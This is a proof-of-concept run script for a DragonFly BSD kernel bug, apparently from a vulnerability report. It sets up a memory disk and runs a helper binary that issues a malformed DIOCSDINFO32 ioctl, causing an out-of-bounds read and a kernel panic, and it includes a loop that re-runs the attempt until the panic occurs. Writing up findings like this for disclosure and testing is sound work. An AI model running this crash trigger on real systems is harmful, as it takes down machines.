DF-0107 / run.sh
#!/bin/sh # DF-0107 run script (run on the DragonFly guest AS ROOT -- vnconfig and opening # /dev/vn0s0 O_RDWR both require root or the operator group; maxx is NOT in # operator, matching the finding's threat model of root/operator-only access). # # Creates an 8 MiB memory disk (vn0), then issues DIOCSDINFO32 with # d_npartitions=0xFFFF. The kernel runs dkcksum32() over the ioctl label # buffer (a 404-byte kmalloc), walking ~1 MiB out of bounds. When the walk # crosses a thread-stack guard page the kernel faults: # # panic: vm_fault: fault on stack guard, addr: 0xffff... # l32_setdisklabel() at l32_setdisklabel+0x57 # dsioctl() at dsioctl+0x721 # # The panic is heap-layout dependent (probabilistic). On a freshly booted guest # it typically fires within the first few invocations; on a churned heap it may # take more. Re-run until panic, e.g.: # for i in $(seq 1 30); do sh run.sh && break; sleep 1; done set -e cd "$(dirname "$0")" # one-time setup of the memory disk rm -f /tmp/oob.img dd if=/dev/zero of=/tmp/oob.img bs=1m count=8 >/dev/null 2>&1 vnconfig -c vn0 /tmp/oob.img >/dev/null 2>&1 || true test -e /dev/vn0s0 || { echo "vn0s0 did not appear"; exit 1; } echo "[*] issuing DIOCSDINFO32 with d_npartitions=0xFFFF on /dev/vn0s0" ./poc_diocsdinfo /dev/vn0s0 echo "[*] ioctl returned without panic (try again -- panic is probabilistic)" |